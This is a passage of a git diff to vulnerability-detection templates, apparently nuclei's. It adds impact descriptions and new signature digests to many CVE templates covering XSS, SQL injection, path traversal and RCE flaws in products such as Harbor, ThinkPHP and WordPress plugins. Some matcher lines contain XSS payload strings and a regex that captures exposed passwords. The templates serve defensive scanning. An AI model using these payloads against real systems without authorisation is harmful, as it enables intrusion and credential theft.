+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.
   remediation: |
     Upgrade Cacti to version 1.2.23 or later to mitigate this vulnerability.
   reference:
@@ -63,4 +65,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402203e5cd6ff36b4662244f525045e222ea56b9e0ed40dbd5e29125f55ea0a7bf4e2022035142838c5ba3b1dccc3f31086d18e5e7fc0d55bce847cbc6881843d0cea4f34:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d3dac6e1ec685013ad6fafd7c6b92feb9e69424bdf5414ebf54d0e5c880df4e7022100e0ebc7fdd396cf66d0a0467822fcaa2a1b3af2176552c00840ab00fd6c8adf79:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-46381.yaml b/http/cves/2022/CVE-2022-46381.yaml
index a5252a30c3..0512135016 100644
--- a/http/cves/2022/CVE-2022-46381.yaml
+++ b/http/cves/2022/CVE-2022-46381.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Linear eMerge E3-Series devices contain a cross-site scripting vulnerability via the type parameter, e.g., to the badging/badge_template_v0.php component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and thus steal cookie-based authentication credentials and launch other attacks. This affects versions 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patch or update provided by the vendor to fix the XSS vulnerability in the Linear eMerge E3-Series.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022056e2b22ebaaa5da655ab16dd943da83e020d3ebf9adedd4275f79300cbbda86802203f5519f53361cd130892be39eed4fbbcf1c5d0a44e97abb7ae7881d5d5702296:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008ff1432fdde33bf97c422118670ce951dcefa8326a8f95a83aea2b19a3af0ee102200a061ed10818a710c8f21a5aaa49ede86b98b8bb4f751e0a8e1618eb7cca5987:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-46443.yaml b/http/cves/2022/CVE-2022-46443.yaml
index d40e81aadf..fb68bfaedb 100644
--- a/http/cves/2022/CVE-2022-46443.yaml
+++ b/http/cves/2022/CVE-2022-46443.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Bangresto 1.0 is vulnberable to SQL Injection via the itemqty%5B%5D parameter.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire application and underlying database.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: word
         words:
           - '{{md5({{num}})}}'
-# digest: 490a0046304402204180bb173d808b3bfe4bf357f41c3a738d036e6c6254dd025a268a2a48bd428502207a4a0db0be54cf85280abb2f2390ec4afe4d40286660b915173e829309a8145f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a010506b620781a8e25fd6e89ffb0c724cba6f187b3dc5cd9b625fa14a31facd022100d27b74911290d49224930dc7e50347f2ff33cac151341e4fddaef9498eb98019:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-46463.yaml b/http/cves/2022/CVE-2022-46463.yaml
index d6e836584a..263b0ee3d3 100644
--- a/http/cves/2022/CVE-2022-46463.yaml
+++ b/http/cves/2022/CVE-2022-46463.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data stored in Harbor.
   remediation: |
     Upgrade Harbor to a version higher than 2.5.3 to mitigate the vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022100c1503d07801a9e7a155cbf5d6498416e53afee7bf88db2c9a77ccc7a2e6a46df021f04aab8b3b6ed001fdacb94e57c4e10368a1a04c78d3e23508afb610eca97f4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c09432501d17ebae202c532028ce4f57d105565705ef12bb87250227c261eca402202647956224271fc4f03418ed6905dcf1857bf22ec76afdcf9e6e68648d20e8ef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-46934.yaml b/http/cves/2022/CVE-2022-46934.yaml
index fdeb1c24e1..f3ad1842b8 100644
--- a/http/cves/2022/CVE-2022-46934.yaml
+++ b/http/cves/2022/CVE-2022-46934.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     kkFileView 4.1.0 is susceptible to cross-site scripting via the url parameter at /controller/OnlinePreviewController.java. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of kkFileView or apply the necessary security patches provided by the vendor.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c5e10abe30979bee622a17f0a533be66e10cbae8340db80e700a04be229b9488022005ec70c29f0863dcbf430553243f6379077e2edfdad357e8545fc2a9fd54c34b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f8615fac239e07b163097da94d1b46d2c6ea94cfe7168a970718c0b85cbc69a102210094fba24f60bea7f9eb86f40dc67a52a163137899fbf5513a199ad49827d58a16:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-47002.yaml b/http/cves/2022/CVE-2022-47002.yaml
index dada19c85b..d001969e3e 100644
--- a/http/cves/2022/CVE-2022-47002.yaml
+++ b/http/cves/2022/CVE-2022-47002.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Masa CMS 7.2, 7.3, and 7.4-beta are susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the system.
   remediation: |
     Apply the latest security patch or update provided by the vendor to fix the authentication bypass vulnerability in Masa CMS.
   reference:
@@ -74,4 +76,4 @@ http:
           - '"lastupdatebyid":"([A-F0-9-]+)"'
         internal: true
         part: body
-# digest: 4a0a00473045022100dfa5438f9490a3cc66df54999d1560b13a50b45b00ffffdeede663191875ebe402202966e8331caa9b349271eac39394d31ac568ad8d6729fbca35e6fd0fbcee8328:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022011769ef3c416682ab330cbc1a3491bbd25bd1659e98fb378116d73e280e54acf02207c45520cab4d5da954c9a321cabdb371dc5af670cec561eba45f8415d6a54c8f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-47003.yaml b/http/cves/2022/CVE-2022-47003.yaml
index d628699511..7ac6107cfc 100644
--- a/http/cves/2022/CVE-2022-47003.yaml
+++ b/http/cves/2022/CVE-2022-47003.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Mura CMS before 10.0.580 is susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the Mura CMS application.
   remediation: |
     Upgrade Mura CMS to version 10.0.580 or later to mitigate this vulnerability.
   reference:
@@ -74,4 +76,4 @@ http:
           - '"lastupdatebyid":"([A-F0-9-]+)"'
         internal: true
         part: body
-# digest: 4b0a00483046022100d44ec8a5c91e060b97458c32c2991b436624bbcd1146c42fa71581dfbddfaebc022100b8e0929d71311d1d89302ce53284d7f93a2a33ac15af8f5b497ed2a167bd8120:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201436d1445426df4d774e7daeeb6cdd2c0a464241cb99cc6d208a1454de3c3ee90220095d49bc2edd7c03ce187195bada94e7742f465f6d07f6581699b378dbd3bbf3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-47615.yaml b/http/cves/2022/CVE-2022-47615.yaml
index d7ed613ef6..adf261f1cd 100644
--- a/http/cves/2022/CVE-2022-47615.yaml
+++ b/http/cves/2022/CVE-2022-47615.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Local File Inclusion vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive files, remote code execution, or information disclosure.
   remediation: |
     Upgrade to the latest version of LearnPress Plugin (4.2.0 or higher) to mitigate this vulnerability.
   reference:
@@ -57,4 +59,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100f8274a7393a40d1e24540b697aa4776cb4b39824b6d43277f2f9d8cb7e2cc68b022100bfec3ef61c7af4f21a1a9bbdca78aadbfe953fd6927572ffb65c89d796cc4ef6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220712d1732beb6fe8b53d86b8538cabdefee42850e8fecb8affb105ba05f050d6e022009ea8bc09fb546750632c1d3a5542113ad9571d51905359f7b7c2779930a093a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-47945.yaml b/http/cves/2022/CVE-2022-47945.yaml
index d4dcfebc5e..043a617ca5 100644
--- a/http/cves/2022/CVE-2022-47945.yaml
+++ b/http/cves/2022/CVE-2022-47945.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php.
+  impact: |
+    This vulnerability can lead to unauthorized access, data leakage, and remote code execution.
   remediation: |
     Apply the latest security patches and updates provided by the Thinkphp framework.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 4b0a00483046022100f2a02586da1be6ed0f26a6fa859a8e32606b93ae251e8227ae5862e5a123076f022100aec141ddf904156cfafc00f377a962cdfc5ee6463024a1bbd4017d1c6816c1fc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205c32a2d72c1d2662496fc2059712d5b42a4231c18b736dcf46fd1b59835cfc7c0220124cc8b6cecb1469fe09e100f806cf84faa7f6903810652ba73d5d2c794e3470:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-47966.yaml b/http/cves/2022/CVE-2022-47966.yaml
index 41dacc06cf..ac5361b481 100644
--- a/http/cves/2022/CVE-2022-47966.yaml
+++ b/http/cves/2022/CVE-2022-47966.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix this vulnerability.
   reference:
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 4b0a00483046022100c089a33e4dcf553fb80f991def55ba4a8c03ce7324581d6136afef67e0a2dba002210096c3375e0b4b1711b45a9f9bcfe2a1c8301d00d71112e4637d0795b79d8051f3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b8327b64ecb06bdcc9b5d1cc0be997e22b3f92da10717a6d740fc3ebfc22db9c022100fce1035bb5cd4028c7405450ec30b6d6101cab002ec5023b2e228b2eec055191:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-47986.yaml b/http/cves/2022/CVE-2022-47986.yaml
index f6ed915c7e..03723e5ba5 100644
--- a/http/cves/2022/CVE-2022-47986.yaml
+++ b/http/cves/2022/CVE-2022-47986.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     IBM Aspera Faspex through 4.4.2 Patch Level 1 is susceptible to remote code execution via a YAML deserialization flaw. This can allow an attacker to send a specially crafted obsolete API call and thereby execute arbitrary code, obtain sensitive data, and/or execute other unauthorized operations.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: The obsolete API call was removed in 4.4.2 PL2. This vulnerability can be remediated by upgrading to either 4.4.2 PL2 or 5.x.
   reference:
     - https://blog.assetnote.io/2023/02/02/pre-auth-rce-aspera-faspex/
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 490a00463044022048a9d7e82cbb807d7ce241f7ae04c4e09901e854def44b99387b8fe560b966b2022035c484b796c92826cba55259a1aa418f6653f6fafb8638b703601341e7464ed7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220729f49988d5c3f23823e139672bdcf45c5ef4d341c79d1a24825ede39189073a02207634822a52f81a970ea23abb642af4964a52fe736ac0ee867ef6ea66423cfcb7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-48012.yaml b/http/cves/2022/CVE-2022-48012.yaml
index b891c8576d..7234536207 100644
--- a/http/cves/2022/CVE-2022-48012.yaml
+++ b/http/cves/2022/CVE-2022-48012.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     OpenCATS 0.9.7 contains a cross-site scripting vulnerability via the component /opencats/index.php?m=settings&a=ajax_tags_upd. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
   remediation: |
     To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
           - contains(body_1, "opencats - Login")
           - contains(body_3, "<script>alert(document.domain);</script>")
         condition: and
-# digest: 4b0a00483046022100a09ae86fc22604d44c29938b0b74633eb318927b82ee231af6f34cd0202a590d022100886c5217924ad46c298a5a4f0edf7ba6031fe5075b1e52f370252e38ef3b943d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210095546fd93b5cb6e8a02d3b1f6245128b6041d3f44d9068dc9a0367f32fb42a50022100e9f0a0b526cc6a165fa40a6a7ebc29651328322e5371ef56e560269396378f92:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-48165.yaml b/http/cves/2022/CVE-2022-48165.yaml
index 2e61c4bfe4..424b32df15 100644
--- a/http/cves/2022/CVE-2022-48165.yaml
+++ b/http/cves/2022/CVE-2022-48165.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Wavlink WL-WN530H4 M30H4.V5030.210121 is susceptible to improper access control in the component /cgi-bin/ExportLogs.sh. An attacker can download configuration data and log files, obtain admin credentials, and potentially execute unauthorized operations.
+  impact: |
+    The vulnerability can lead to unauthorized access, data leakage, or unauthorized actions on the affected device.
   remediation: |
     Apply the latest firmware update provided by the vendor to fix the access control issue.
   reference:
@@ -57,4 +59,4 @@ http:
       - type: regex
         regex:
           - 'Password=([^\s]+)'
-# digest: 4b0a00483046022100b962b5c15ec46774368e320f55b684033f98f5d89b220f6db2c0202feb41684e022100ad0d887334311f75b1588b9521e21493a5b5ac066cc8da4a1e51b49d657af3a6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210081c4932b42917a55c5f2fbd6cd5e59af821f7f1adf0edb30ff7b764fd3a996c202203d8922d00c94b522e7be48943cf81123bdc3459cb38383ae458cba35e0160816:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-4897.yaml b/http/cves/2022/CVE-2022-4897.yaml
index a708aaf68e..0ec500ca4f 100644
--- a/http/cves/2022/CVE-2022-4897.yaml
+++ b/http/cves/2022/CVE-2022-4897.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: Fixed in version 8.8.3.
   reference:
     - https://wpscan.com/vulnerability/7b0eeafe-b9bc-43b2-8487-a23d3960f73f
@@ -45,4 +47,4 @@ http:
           - 'contains(body_2, "onload=alert(document.domain)")'
           - 'contains(body_2, "BackupBudddy iFrame")'
         condition: and
-# digest: 4b0a00483046022100aeda15210bc660462a8aa5ac6e107934ef96810c539e8057b1566425567eda6a02210080461c6b70a8c5844b3cc643a92dec7161efb216a6a62b434cd38a225da62f44:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100db001ae8a2191a6382e2bbe65c798b5b00b232e1c705d6e8117c442857c25ef6022004af4d88d7079a364b0bcc62b0ff493480121281382c78d51f3ad605b23af7b8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-0099.yaml b/http/cves/2023/CVE-2023-0099.yaml
index 352a4938e5..9d9fbead8e 100644
--- a/http/cves/2023/CVE-2023-0099.yaml
+++ b/http/cves/2023/CVE-2023-0099.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
+  impact: |
+    Successful exploitation of this vulnerability can lead to session hijacking, defacement of websites, theft of sensitive information, and potential remote code execution.
   remediation: Fixed in version 115
   reference:
     - https://wpscan.com/vulnerability/fd50f2d6-e420-4220-b485-73f33227e8f8
@@ -46,4 +48,4 @@ http:
           - 'contains(body, "</script><svg/onload=alert(document.domain)>")'
           - 'contains(body_2, "search_term")'
         condition: and
-# digest: 490a00463044022019a2d3be04940c2750e08f7113e147d57c66c68b46319f86492472614c4b99d10220099a7f498696c0546ab6649133a4a2f6ce8e76ebcaa6fc1da784ec2bf9656c80:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022038bd12aa3bb2301e71ff7192c83d09a22a80bc60fbc97e1c3a81362894688b2802205034c119649b0a05bcdfcc4d67443ae25fb08b231ea427db9562a7ff1ee9f061:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-0126.yaml b/http/cves/2023/CVE-2023-0126.yaml
index 28d820d39f..9f0deb6cbf 100644
--- a/http/cves/2023/CVE-2023-0126.yaml
+++ b/http/cves/2023/CVE-2023-0126.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the affected device, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Apply the latest security patches or firmware updates provided by SonicWall to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402202392665ee552ecb18ecc55a4335fecc2f92f3e0f288ec174bdf7d11d716f4bc60220647e5ba6653ffabda1a3a00ca7e5cb0de97ac10e4ff14f0fcce03cdbdb175b0c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100946d5071acd37379bd9a420d87cdb1db9446314b2483cbc66e25604c63ed168702206ff9d61cd302bd7b445a80a6389c27c1a74e8b93f7d5a7bdf92b7ad62fcc30ee:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-0236.yaml b/http/cves/2023/CVE-2023-0236.yaml
index 10dc1c06f6..63e29101b0 100644
--- a/http/cves/2023/CVE-2023-0236.yaml
+++ b/http/cves/2023/CVE-2023-0236.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Tutor LMS plugin before 2.0.10 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the reset_key and user_id parameters before outputting then back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: Fixed in version 2.0.10.
   reference:
     - https://wpscan.com/vulnerability/503835db-426d-4b49-85f7-c9a20d6ff5b8
@@ -45,4 +47,4 @@ http:
           - 'contains(body_2, "<svg onload=prompt(document.domain)>")'
           - 'contains(body_2, "Instructor Registration")'
         condition: and
-# digest: 490a0046304402205c7d0964d78e93e9046267345890ec187f64f531d619242d21e605e1fa6595cd0220542ca8c9ce4cc3616111b002a0e06af0767666be47caa3cfbceeaceed68df5a2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d9a5f61c2f4672f5227d0a5ab221ffa12e73153529d80dc7be8d621faf6f617402210098baaffb33ae6585ce23c9fee949f0410439d1fe77c7e468d9fcaa3d4baf45f2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-0261.yaml b/http/cves/2023/CVE-2023-0261.yaml
index 72fae7692c..4611c77829 100644
--- a/http/cves/2023/CVE-2023-0261.yaml
+++ b/http/cves/2023/CVE-2023-0261.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary SQL queries on the WordPress database, potentially leading to unauthorized access, data manipulation, or privilege escalation.
   remediation: Fixed in version 10.8.
   reference:
     - https://wpscan.com/vulnerability/6a3b6752-8d72-4ab4-9d49-b722a947d2b0
@@ -51,4 +53,4 @@ http:
           - 'contains(content_type_2, "application/json")'
           - 'contains(body_2, "\"data\":{")'
         condition: and
-# digest: 490a004630440220352a46fe39219f14e4a2f63676110fda995e2ce4b36cc39668b4d3188a819526022072be3e587f84a985b1212c914cc9efecf5c5288c5f5e2c3c4b86845a03f06ca4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009e63ba3c2caeb4ff31ada20586dfadd55046aaef989ed4ba4996abbd6e7b898a02204015cb58dcd6d3f5a4060e8d0dec57954af237470458597eb0f1fde0a1b07ea2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml
index 9e3eb8430c..b26347c6a0 100644
--- a/http/cves/2023/CVE-2023-0297.yaml
+++ b/http/cves/2023/CVE-2023-0297.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the target system.
   remediation: |
     Upgrade PyLoad to a version that is not affected by this vulnerability.
   reference:
@@ -56,4 +58,4 @@ http:
         part: interactsh_protocol
         words:
           - "dns"
-# digest: 4a0a00473045022048124feb825340c174eed92ef9aaa0bd93a65f3bda1b9856739599efe4b1d7dd022100829f0f7060256eda145a401f389d54a9db510defb277b0a7fdf9dac0ec9aa076:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ae3b9edcb170fee39e7bfbfc1f3077c6ae0d247111c36c71a091b735d1db6051022056afe9284e1fec40f6a003a7fee52589116ac69f0ed7866bfbe310b3602dbfa3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-0448.yaml b/http/cves/2023/CVE-2023-0448.yaml
index 2083330678..5969b01c6d 100644
--- a/http/cves/2023/CVE-2023-0448.yaml
+++ b/http/cves/2023/CVE-2023-0448.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The WP Helper Lite WordPress plugin, in versions < 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: Fixed in version 4.3 and above
   reference:
     - https://wpscan.com/vulnerability/1f24db34-f608-4463-b4ee-9bc237774256
@@ -40,4 +42,4 @@ http:
           - 'contains(body, "><svg onload=alert(document.domain)>")'
           - 'contains(body, "params\":{\"action")'
         condition: and
-# digest: 490a00463044022069bdf2435ea8c014ecfb2cf89aed82adcb1ec1e656be74b686ebac0e1217514802206b7d75fa12fae29680297fe40065058d59f282ab9a654d0c1f5a5417d84f63f8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203284fa2cd4c61cd46c8ec4611d74232f7b04c464e0e99ba5bf7aa071e2f14ed1022100c373dec5f126a4152956472ee5cb773bed0a9846dc99b5d804ad582758b98a7c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-0514.yaml b/http/cves/2023/CVE-2023-0514.yaml
index 7a50aaeab7..899ce98679 100644
--- a/http/cves/2023/CVE-2023-0514.yaml
+++ b/http/cves/2023/CVE-2023-0514.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Membership Database before 1.0 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to a patched version of the Membership Database software or apply the necessary security patches provided by the vendor.
   reference:
@@ -51,4 +53,4 @@ http:
           - 'contains(body_2, "<script>alert(document.domain)</script>")'
           - 'contains(body_2, "Member Database")'
         condition: and
-# digest: 4b0a00483046022100c4a14260be443e23e255eb272b85c3118d361b390a66c8249b9e59814d209e59022100bed28ca3d33357d06ceb7921d325080d1902e4cf8ddcf8a717add4ccc5e849f1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a730429fc4b8816f098e253ad3dc104bff801f6ddbd7a3d60466189d21efefd20220700be20b5efd55b3c05795b05adef61953eac0fe3cad44c1710ba9ec1537d1c0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-0562.yaml b/http/cves/2023/CVE-2023-0562.yaml
index 4f398a95cc..7bb0ec7512 100644
--- a/http/cves/2023/CVE-2023-0562.yaml
+++ b/http/cves/2023/CVE-2023-0562.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
           - 'contains(body, "admin")'
           - 'contains(body, "BLMS | Dashboard")'
         condition: and
-# digest: 4b0a0048304602210088fc0bce5e9739ea35b5641c2e09a32e81d66c2229260c1dd9097cf0a0d16acb022100f3aed85cbbba1e6bdc6159bd2c1d818f57e18b7f97fa617f19d3d2dabe90a5d0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c00a8f5792a786f63f2fcc150bbc43ba5f255aa0c38f583a37c710f0718200f7022071de900008a0f527139933f17fd49ae19e82c821c9279a0d56d3eedb58fbd3b7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-0563.yaml b/http/cves/2023/CVE-2023-0563.yaml
index e9f42e9da8..7abf19d7ee 100644
--- a/http/cves/2023/CVE-2023-0563.yaml
+++ b/http/cves/2023/CVE-2023-0563.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A vulnerability classified as problematic has been found in PHPGurukul Bank Locker Management System 1.0. This affects an unknown part of the file add-locker-form.php of the component Assign Locker. The manipulation of the argument ahname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
+  impact: |
